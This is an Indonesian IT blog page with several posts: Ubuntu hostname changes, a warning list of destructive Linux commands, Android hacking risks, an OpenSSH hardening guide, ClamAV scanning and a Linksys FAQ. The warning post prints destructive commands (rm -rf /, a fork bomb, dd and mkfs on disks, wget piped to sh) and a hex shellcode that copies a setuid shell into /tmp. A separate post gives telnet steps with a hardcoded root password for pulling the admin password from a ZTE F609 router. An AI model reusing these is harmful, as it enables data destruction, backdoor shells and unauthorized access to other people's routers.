Copyrights @ Journal 2014 - Designed By Templateism - SEO Plugin by MyBloggerLab

Monday, October 17, 2016

, , , ,

Merubah Nama Komputer Pada Ubuntu Server

Untuk merubah computer name pada Ubuntu caranya yaitu mengubah file /etc/hosts dan /etc/hostname
ketikkan perintah sudo nano /etc/hosts dan ubah nama server dengan nama yang baru

ketikkan perintah sudo nano /etc/hostname dan ubah nama server sama dengan sebelumnya

kemudian reboot ubuntu dengan perintah sudo reboot.


Friday, October 14, 2016

, , , , ,

8 Perintah Mematikan dan Berbahaya Pada Linux


Perintah dalam Linux memang sangat powerfull, dan Linux tidak akan meminta konfirmasi jika ada perintah yang dijalankan walaupun itu dapat merusak sistem Anda. Jika Anda masih baru dalam penggunaan sistem operasi Linux, ada baiknya simak beberapa perintah (command) di bawah ini untuk melindungi sistem operasi Anda dan meningkatkan pengetahuan tentang perintah dasar Linux.
Dengan catatan beberapa perintah di bawah ini menjadi sangat berbahaya apabila didahului dengan sudo (pada Ubuntu). Pada distribusi Linux lainnya perintah harus dijalankan sebagai root

1. rm -rf / (Hapus Semua!)

perintah rm-rf / dapat menghapus semuanya jika memungkinkan, termasuk file/data pada harddrive Anda dan file yang terhubung pada removable device. Jika dipilah maka pengertian perintah di atas adalah sebagai berikut:

  • rm - menghapus file yang dikehendaki
  • -rf - menjalankan perintah rm secara rekursif (menghapus semua file dan folder di dalam folder yang ditentukan) dan akan menghapus 'secara paksa' tanpa menampilkan konfirmasi kepada Anda
  • / - menjalankan perintah rm mulai dari direktori root '/' yang berisi semua file pada komputer dan semua media yang terhubung, termasuk file remote share dan removable drives

Linux akan menjalankan perintah penghapusan data tanpa adanya konfirmasi dari Anda, oleh karena itu hati-hati dalam menggunakan perintah ini. Perintah ini dapat dijalankan dengan banyak variasi, contohnya rm -rf ~ akan menghapus semua data pada home directory. Kemudian rm -rf.* akan menghapus semua file konfigurasi

2. Kode Penyamaran rm -rf /

Dapat Anda temukan ketika browsing dengan menggunakan versi hex.
 char esp[] __attribute__ ((section(“.text”))) /* e.s.p  
 release */  
 = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”  
 “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”  
 “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”  
 “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”  
 “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”  
 “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”  
 “\x6e\x2f\x73\x68\x00\x2d\x63\x00”  
 “cp -p /bin/sh /tmp/.beyond; chmod 4755  
 /tmp/.beyond;”;  

Jangan pernah menjalankan perintah 'aneh' yang tidak dapat Anda mengerti

3. :(){ :|: & };: – Fork Bomb

Perintah ini sangat sederhana sepertinya namun sangat berbahaya :(){ :|: & };:

Deskripsi dari perintah ini adalah sebuah shell yang berfungsi untuk menggandakan dirinya sendiri. Proses duplikasi akan terus berulang sampai CPU dan memory dengan cepat terbebani secara penuh. Oleh karena itu komputer akan hang. Dan ini adalah dasar dari Denial Of Service Attack

4. mkfs.ext4 /dev/sda1 - Memformat Hard Drive

Perintah ini sangat mudah untuk dipahami dimana

  • mkfs.ext4 - Membuat file sistem ext4 baru pada device yang bersangkutan
  • /dev/sda1 - Menentukan partisi pertama pada hard drive pertama, dimana kemungkinannya dipakai

Dengan kata lain, perintah ini sama dengan memformat drive C: pada sistem operasi Windows dan menghapus file sistem yang lama kemudian mengganti dengan file sistem yang baru. Perintah yang sama yaitu mkfs.ext3 /dev/sdb2 yang akan menjalankan proses format pada partisi kedua pada hard drive kedua dengan file sistem ext3.

HATI-HATI dalam menjalankan perintah pada hard drive secara langsung dengan awalan /dev/sd

5. command > /dev/sda – Perintah untuk menulis data secara langsung

Perintah command > /dev/sda mengirimkan perintah bahwa penulisan data langsung pada hard drive pertama Anda, dimana dapat membahayakan file system. Penjelasannya bisa disimak di bawah ini:
  • command – menjalankan perintah (apapun perintahnya)
  • > – mengirimkan perintah untuk menuju lokasi yang dituju.
  • /dev/sda – Menuliskan perintah langsung pada hard drive.

6. dd if=/dev/random of=/dev/sda – Menulis Data 'Junk' ke Hard Drive 

Perintah dd if=/dev/random of=/dev/sda ini juga akan melenyapkan semua data pada hard drive Anda
  • dd – menjalankan perintah duplikasi low-level dari lokasi satu ke lokasi lainnya.
  • if=/dev/random – menggunakan /dev/random (data acak) sebagai input.
  • of=/dev/sda – Outpun pada harddsik pertama, menumpukinya dengan data sampah yang acak dan dapat membahayakan sistem.

7. mv ~ /dev/null – Memindahkan Home Dir ke Lubang Hitam.

/dev/null merupakan lokasi khusus, dengan memindahkannya ke /dev/null sama saja dengan menghancurkannya. Dengan kata lain /dev/null adalah black hole.
  • mv – memindahkan file atau direktori ke lokasi lainnya.
  • ~ – mewakili home directory Anda.
  • /dev/null – memindahkan semua data dan menghancurkan data asalnya.

8. wget http://example.com/something -O – | sh – Download dan Menjalankannya Sebagai Script

Perintah di atas mengunduh script dari website dan mengirimkannya ke shell, yang mana mengeksekusi isi dari script tersebut. Hal ini sangat berbahaya apabila Anda tidak tahu script mana yang aman dan tidak, Jangan menjalankan script yang tidak jelas
  • wget – Download sebuah file 
  • http://example.com/something – Lokasi website yang akan didownload.
  • | – Tanda ini mengirimkan perintah wget ke perintah lainnya.
  • sh – Mengirimkan file tersebut ke dalam shell dimana akan dijalankan jika berbentuk bash script
Jika Anda mempunyai pengalaman tentang Perintah Mematikan dan Berbahaya Pada Linux yang lainnya, bagikan pada komentar di bawah ini.

Sumber:
http://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/
, , , , , , , , , , ,

Hacker Bobol Smartphone Android Anda, Simak Caranya!


Bagaimana cara Hacker Bobol Smartphone Anda?

Smartphone menjadi trend saat ini karena banyaknya fasilitas yang mempermudah kita dalam menjalani kehidupan. Barang pribadi ini harus ada di tangan setiap orang kalau tidak ingin ketinggalan jaman. Semakin canggih maka spesifikasinya juga akan semakin tinggi apalagi harga sangat bervariasi. Tapi semua itu juga akan berdampak pada celah keamanan yang harus diperhatikan oleh setiap produsen smartphone, agar tidak terjadi pencurian data maupun privasi pengguna smartphone oleh pihak yang tidak bertanggungjawab, seperti hacker.
Android menjadi salah satu target favorit mereka karena banyak cara untuk mengeksploitasi keamanan dari smartphone itu sendiri. Baik data yang bisa dicuri, sistem yang dapat dirusak dan sebagainya bisa mereka lakukan dengan berbagai cara seperti yang akan saya jelaskan di bawah ini.

Aplikasi Chatting dan SMS/MMS

Pernah saya mendapatkan pesan dari aplikasi chatting yang berisi URL (atau Hyperlink) menuju website lain yang tidak saya kenal. Karena penasaran saya buka pada jendela penyamaran (Icognito Mode) untuk jaga-jaga. Benar saja setelah terbuka situs tersebut termasuk kategori phising karena mengharuskan kita mengisi data pribadi dan password untuk direkam. Setelah itu secara tidak langsung kita menyerahkan user dan password atau data privasi lainnya kepada para hacker secara cuma-cuma.
Solusinya jangan mudah percaya dan sembarangan untuk add friend, pin bbm, whatsapp, line karena sangat berbahaya sekali. Serta jangan merespon untuk membuka URL yang dikirimkan dari orang yang tak dikenal

Melalui Certifi-Gate

Implementasi Mobile Remote Support Tool yang tertanam pada sistem operasi android ini memungkinkan hacker menemukan celah untuk masuk ke dalam smartphone dan meretasnya. Certifi-Gate ini dipasang oleh setiap pabrikan smartphone android Anda dimana plugin dari pihak ketiga bekerja dengan cara menduplikasi dan melakukan beberapa tindakan ke layar perangkat menggunakan certificate dari OEM (produsen perangkat Android)
Jika benar-benar berhasil, hacker akan mendapatkan hak akses tak terbatas pada perangkat kita sehingga mereka dapat mengakses data user dan tindakan lainnya.
Solusinya, jangan mudah untuk percaya dan sembarangan install aplikasi dari penyedia selain dari PlayStore atau yang terpercaya.

Melalui Kunci Sidik Jari (Finger Print)

Aplikasi ini merupakan bloatware (aplikasi bawaan) ataupun aplikasi dari pihak ketiga yang kita install dari Google Play misalnya, dengan mudah dibobol dan dicuri datanya. Para hacker masuk ke dalam smartphone kita melalui internet, dan menyisipkan code untuk mencuri data dari sidik jari. Dengan begitu informasi dan data dengan mudah mereka dapatkan dan kadang smartphone kita akan mengirimkan pesan sendiri, browsing atau aktifitas lainnya tanpa kita kendalikan.

Melalui Aplikasi Baterai

Sejatinya Aplikasi Power Saver ini adalah aplikasi sniffing terhadap smartphone kita, dimana semua data, cookies, aplikasi yang berjalan, cache, dan lainnya akan direkam untuk dikalkulasikan agar smartphone dapat menghemat penggunaan daya.
Namun, celah keamanan sangat terbuka dari sisi ini karena dengan menanamkan kode jahat-nya, hacker akan dengan mudah untuk mengumpulkan informasi dari smartphone kita. Apalagi kita terhubung dengan internet dimana data akan secara otomatis tersinkron dengan server (yang sudah di buat oleh hacker tentunya)
Solusinya adalah jangan terlalu mudah untuk install aplikasi dari pihak ketiga yang belum terpercaya seperti pada Google Play. Itupun masih ada beberapa aplikasi yang telah dilaporkan ditanami kode untuk mencuri data. Jadi bijaklah dalam menggunakan teknologi dan simpan data/privasi secara benar dan aman.

Sumber tulisan: http://belajarcodings.com/hacker-akan-membobol-smartphone-android-anda-begini-caranya/
, , , , ,


Apa itu SSH? Pengertian dan fungsi SSH (Secure Shell) Pengertian dan fungsi SSH (Secure Shell) - Pengertian SSH adalah akronim dari Secure Shell yang merupakan sebuah protokol jaringan yang memanfaatkan kriptografi untuk melakukan komunikasi data pada perangkat jaringan agar lebih aman.

Contents

  • Introduction
  • Disable Password Authentication
  • Disable Forwarding
  • Specify Which Accounts Can Use SSH
  • Rate-limit the connections
  • Log More Information
  • Display a Banner
  • Troubleshooting

Introduction

Once you have installed an OpenSSH server,
sudo apt-get install openssh-server
you will need to configure it by editing the sshd_config file in the /etc/ssh directory.
sshd_config is the configuration file for the OpenSSH server. ssh_config is the configuration file for the OpenSSH client. Make sure not to get them mixed up.
First, make a backup of your sshd_config file by copying it to your home directory, or by making a read-only copy in /etc/ssh by doing:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.factory-defaults
sudo chmod a-w /etc/ssh/sshd_config.factory-defaults
Creating a read-only backup in /etc/ssh means you'll always be able to find a known-good configuration when you need it.

Once you've backed up your sshd_config file, you can make changes with any text editor, for example;
sudo gedit /etc/ssh/sshd_config
runs the standard text editor in Ubuntu 12.04 or more recent. For older versions replace "sudo" with "gksudo". Once you've made your changes (see the suggestions in the rest of this page), you can apply them by saving the file then doing:
sudo restart ssh
If you get the error, "Unable to connect to Upstart", restart ssh with the following:
sudo systemctl restart ssh
Configuring OpenSSH means striking a balance between security and ease-of-use. Ubuntu's default configuration tries to be as secure as possible without making it impossible to use in common use cases. This page discusses some changes you can make, and how they affect the balance between security and ease-of-use. When reading each section, you should decide what balance is right for your specific situation.

Disable Password Authentication

Because a lot of people with SSH servers use weak passwords, many online attackers will look for an SSH server, then start guessing passwords at random. An attacker can try thousands of passwords in an hour, and guess even the strongest password given enough time. The recommended solution is to use SSH keys instead of passwords. To be as hard to guess as a normal SSH key, a password would have to contain 634 random letters and numbers. If you'll always be able to log in to your computer with an SSH key, you should disable password authentication altogether.

If you disable password authentication, it will only be possible to connect from computers you have specifically approved. This massively improves your security, but makes it impossible for you to connect to your own computer from a friend's PC without pre-approving the PC, or from your own laptop when you accidentally delete your key.

It's recommended to disable password authentication unless you have a specific reason not to.

To disable password authentication, look for the following line in your sshd_config file:
#PasswordAuthentication yes
replace it with a line that looks like this:
PasswordAuthentication no
Once you have saved the file and restarted your SSH server, you shouldn't even be asked for a password when you log in.
Disable Forwarding
By default, you can tunnel network connections through an SSH session. For example, you could connect over the Internet to your PC, tunnel a remote desktop connection, and access your desktop. This is known as "port forwarding".

By default, you can also tunnel specific graphical applications through an SSH session. For example, you could connect over the Internet to your PC and run nautilus "file://$HOME" to see your PC's home folder. This is known as "X11 forwarding".

While both of these are very useful, they also give more options to an attacker who has already guessed your password. Disabling these options gives you a little security, but not as much as you'd think. With access to a normal shell, a resourceful attacker can replicate both of these techniques and a specially-modified SSH client.

It's only recommended to disable forwarding if you also use SSH keys with specified commands.

To disable forwarding, look for the following lines in your sshd_config:
AllowTcpForwarding yes
X11Forwarding yes
and replace them with:
AllowTcpForwarding no
X11Forwarding no
If either of the above lines don't exist, just add the replacement to the bottom of the file. You can disable each of these independently if you prefer.

Specify Which Accounts Can Use SSH

You can explicitly allow or deny access for certain users or groups. For example, if you have a family PC where most people have weak passwords, you might want to allow SSH access just for yourself.

Allowing or denying SSH access for specific users can significantly improve your security if users with poor security practices don't need SSH access.

It's recommended to specify which accounts can use SSH if only a few users want (not) to use SSH.

To allow only the users Fred and Wilma to connect to your computer, add the following line to the bottom of the sshd_config file:
AllowUsers silumansupra
To allow everyone except the users Dino and Pebbles to connect to your computer, add the following line to the bottom of the sshd_config file:
DenyUsers neverflatz
It's possible to create very complex rules about who can use SSH - you can allow or deny specific groups of users, or users whose names match a specific pattern, or who are logging in from a specific location. For more details about how to create complex rules, see the sshd_config man page

Rate-limit the connections

It's possible to limit the rate at which one IP address can establish new SSH connections by configuring the uncomplicated firewall (ufw). If an IP address is tries to connect more than 10 times in 30 seconds, all the following attempts will fail since the connections will be DROPped. The rule is added to the firewall by running a single command:
sudo ufw limit ssh
On a single-user or low-powered system, such as a laptop, the number of total simultaneous pending (not yet authorized) login connections to the system can also be limited. This example will allow two pending connections. Between the third and tenth connection the system will start randomly dropping connections from 30% up to 100% at the tenth simultaneous connection. This should be set in sshd_config.
MaxStartups 2:30:10
In a multi-user or server environment, these numbers should be set significantly higher depending on resources and demand to alleviate denial-of-access attacks. Setting a lower the login grace time (time to keep pending connections alive while waiting for authorization) can be a good idea as it frees up pending connections quicker but at the expense of convenience.
LoginGraceTime 30

Log More Information

By default, the OpenSSH server logs to the AUTH facility of syslog, at the INFO level. If you want to record more information - such as failed login attempts - you should increase the logging level to VERBOSE.

It's recommended to log more information if you're curious about malicious SSH traffic.

To increase the level, find the following line in your sshd_config:
LogLevel INFO
and change it to this:
LogLevel VERBOSE
Now all the details of ssh login attempts will be saved in your /var/log/auth.log file.

If you have started using a different port, or if you think your server is well-enough hidden not to need much security, you should increase your logging level and examine your auth.log file every so often. If you find a significant number of spurious login attempts, then your computer is under attack and you need more security.

Whatever security precautions you've taken, you might want to set the logging level to VERBOSE for a week, and see how much spurious traffic you get. It can be a sobering experience to see just how much your computer gets attacked.

Display a Banner

If you want to try to scare novice attackers, it can be funny to display a banner containing legalese. This doesn't add any security, because anyone that's managed to break in won't care about a "no trespassing" sign--but it might give a bad guy a chuckle.

To add a banner that will be displayed before authentication, find this line:
#Banner /etc/issue.net
and replace it with:
Banner /etc/issue.net
This will display the contents of the /etc/issue.net file, which you should edit to your taste. If you want to display the same banner to SSH users as to users logging in on a local console, replace the line with:
Banner /etc/issue
To edit the banner itself try
sudo gedit /etc/issue.net
Here is an example for what you might put in an issue or issue.net file and you could just copy&paste this in:
***************************************************************************
 NOTICE TO USERS


This computer system is the private property of its owner, whether
individual, corporate or government. It is for authorized use only.
Users (authorized or unauthorized) have no explicit or implicit
expectation of privacy.

Any or all uses of this system and all files on this system may be
intercepted, monitored, recorded, copied, audited, inspected, and
disclosed to your employer, to authorized site, government, and law
enforcement personnel, as well as authorized officials of government
agencies, both domestic and foreign.

By using this system, the user consents to such interception, monitoring,
recording, copying, auditing, inspection, and disclosure at the
discretion of such personnel or officials. Unauthorized or improper use
of this system may result in civil and criminal penalties and
administrative or disciplinary action, as appropriate. By continuing to
use this system you indicate your awareness of and consent to these terms
and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the
conditions stated in this warning.

****************************************************************************

Troubleshooting

Once you have finished editing sshd_config, make sure to save your changes before restarting your SSH daemon.

First, check that your SSH daemon is running:
ps -A | grep sshd
This command should produce a line like this:
<some number> ? 00:00:00 sshd
If there is no line, your SSH daemon is not running. If it is, you should next check that it's listening for incoming connections:
sudo ss -lnp | grep sshd
This command should produce a line that looks like one of these:
0 128 :::22 :::* users:(("sshd",16893,4))
0 128 *:22 *:* users:(("sshd",16893,3))
If there is more than one line, in particular with a port number different than 22, then your SSH daemon is listening on more than one port - you might want to go back and delete some Port lines in your sshd_config. If there are no lines, your SSH daemon is not listening on any ports, so you need to add at least one Port line. If the line specifies something other than "*:22" ([::]:22 is IPv6), then your SSH daemon is listening on a non-standard port or address, which you might want to fix.

Next, try logging in from your own computer:
ssh -v localhost
This will print a lot of debugging information, and will try to connect to your SSH server. You should be prompted to type your password, and you should get another command-line when you type your password in. If this works, then your SSH server is listening on the standard SSH port. If you have set your computer to listen on a non-standard port, then you will need to go back and comment out (or delete) a line in your configuration that reads Port 22. Otherwise, your SSH server has been configured correctly.

To leave the SSH command-line, type:
exit
If you have a local network (such as a home or office network), next try logging in from one of the other computers on your network. If nothing happens, you might need to tell your computer's firewall to allow connections on port 22 (or from the non-standard port you chose earlier).

Finally, try logging in from another computer elsewhere on the Internet - perhaps from work (if your computer is at home) or from home (if your computer is at your work). If you can't access your computer this way, you might need to tell your router's firewall to allow connections from port 22, and might also need to configure Network Address Translation.

sumber: https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
, , ,
ClamAV can only detect viruses and move any infected files into a quarantined folder; it cannot remove them from files. ClamAv detects viruses on all platforms, but it is primarily useful for Windows viruses and malware.

Install paket ClacmAV dengan command
sudo apt-get install clamav

Langkah selanjutnya adalah update virus definitions:
sudo freshclam

baru kita dapat scan virus dengan command
clamscan OPTIONS File/Folder

atau kita dapat menggunakan perintah dengan root-permission
sudo clamscan

Contoh:

Untuk memeriksa semua file pada komputer dan menampilkan nama tiap file:
clamscan -r /

Untuk memeriksa semua file pada komputer dan hanya menampilkan file yang terinfeksi dan menampilkan notifikasi ketika ditemukan:
clamscan -r --bell -i /

Untuk memeriksa semua file pada komputer dan menampilkan file yang terinfeksi dan dijalankan pada background:
clamscan -r -i / &

Catatan – untuk menampilkan proses yang berjalan pada background dengan menggunakan perintah
jobs

Untuk memeriksa file pada semua direktori /home tiap user:
clamscan -r /home

Untuk memeriksa file pada direktori /home user dan memindahkan file yang terinfeksi ke direktori lain:
clamscan -r --move=/home/USER/VIRUS /home/USER

Untuk memeriksa files pada direktori /home user dan menghapus file yang terinfeksi (PERHATIAN: file akan dihapus dan hilang.):
clamscan -r --remove /home/USER

Untuk melihat opsi yang lainnya:
clamscan --help



, , , , , ,

Bobol ZTE F609 Via Telnet

Bagaimana Cara Hack Modem Speedy ZTE f609? Ingin tahu password admin modem ZTE F609 tanpa harus reset modem? Dengan menggunakan celah dari ZTE F609 kita bisa mengetahui password admin nya.

Langkah-langkah Hack Modem Speedy F609:

1. Buka CMD, ketikkan telnet (aktifkan terlebih dahulu telnet client) -lihat caranya di sini
2. Pada command line, ketikkan telnet
3. ketik ” o 192.168.1.1 ” (IP dari modem ZTE F609)
4. Login User: root, Password: Zte521 (Case Sensitive)
5. ketikkan perintah ” sendcmd 1 DB p DevAuthInfo
6. cari user admin dan passwordnya

Lihat Tutorial Video Hack Modem Speedy F609


, , , , ,

Cara Mengaktifkan Telnet Pada Windows 10

Telnet adalah salah satu protokol client-server yang berbasis CLI (Comman Line Interface) yang dapat digunakan untuk remote server, dan pada umumnya menggunakan port 23. Secara bawaan Windows 10 tidak mengaktifkan fasilitas telnet ini, tapi dapat diaktifkan pada menu Program and Feature (Anda dapat menggunakannya dengan fasilitas Search)

Cara Aktifasi Telnet pada menu Program and Feature


  • Klik Start
  • Klik Control Panel
  • Pilih  View By : Large icons atau small icons ( di sebelah kanan atas )
  • Pilih Programs And Features
  • Klik Turn Windows features on or off ( di sebelah kiri atas )
  • Beri chek list pada  Telnet Client
  • Klik OK.

Video .gif nya


Menggunakan Telnet via CMD

Anda bisa menggunakan Telnet pada CMD dengan menggunakan perintah di bawah ini:



Thursday, October 13, 2016

, , , , , ,

F.A.Q LinkSys E1200


Pertanyaan-pertanyaan seputar Access Point E1200 yang sering ditanyakan bisa Anda simak di bawah ini

Informasi Tentang Hardware 

What is Linksys E1200?

Linksys E1200 adalah Wireless router tipe N dengan 4 port ethernet. Bisa digunakan untuk berbagi alat seperti komputer, printer dan data. Dengan berbagai fasilitas seperti SPI Firewall dan melindungi keamanan data Anda ketika online.

Default User dan Password E1200 untuk setting via website

IP defaultnya adalah 192.168.1.1 dengan username dan password 'admin'

Reset Factory Default

Ada dua cara, yaitu:

•  Hardware Reset – Tekan dan tahan tombol RESET yang terletak pada bawah device sekitar 5 detik dan lepaskan .
•  Software Reset – Access the web-based setup page, go to Administration tab > Factory Defaults sub-tab, click the Restore Factory Defaults button.

Sistem Operasi dan Web Browser yang mendukung E1200


  • Windows
  • Windows XP SP3
  • Windows Vista SP1 or later
  • Windows 7
  • Windows 8 
  • Windows 10
  • Mac OS X®
  • Leopard 10.5
  • Snow Leopard 10.6
  • Mavericks 10.9
  • Yosemite 10.10 
  • Web Browser
  • Internet Explorer 7
  • Safari® 4
  • Firefox® 3 or higher
Selengkapnya, kunjungi website E1200 FAQ 
, , , , ,

Pengertian Jaringan Komputer

Dari Wikipedia bahasa Indonesia, ensiklopedia bebas


Jaringan komputer (jaringan) adalah jaringan telekomunikasi yang memungkinkan antar komputer untuk saling bertukar data.
Tujuan dari jaringan komputer adalah agar dapat mencapai tujuannya, setiap bagian dari jaringan komputer dapat meminta dan memberikan layanan (service).Pihak yang meminta/menerima layanan disebut klien (client) dan yang memberikan/mengirim layanan disebut peladen (server). Desain ini disebut dengan sistem client-server, dan digunakan pada hampir seluruh aplikasi jaringan komputer.

Dua buah komputer yang masing-masing memiliki sebuah kartu jaringan, kemudian dihubungkan melalui kabel maupun nirkabel sebagai medium transmisi data, dan terdapat perangkat lunak sistem operasi jaringan akan membentuk sebuah jaringan komputer yang sederhana. Apabila ingin membuat jaringan komputer yang lebih luas lagi jangkauannya, maka diperlukan peralatan tambahan seperti Hub, Bridge, Switch, Router, Gateway sebagai peralatan interkoneksinya.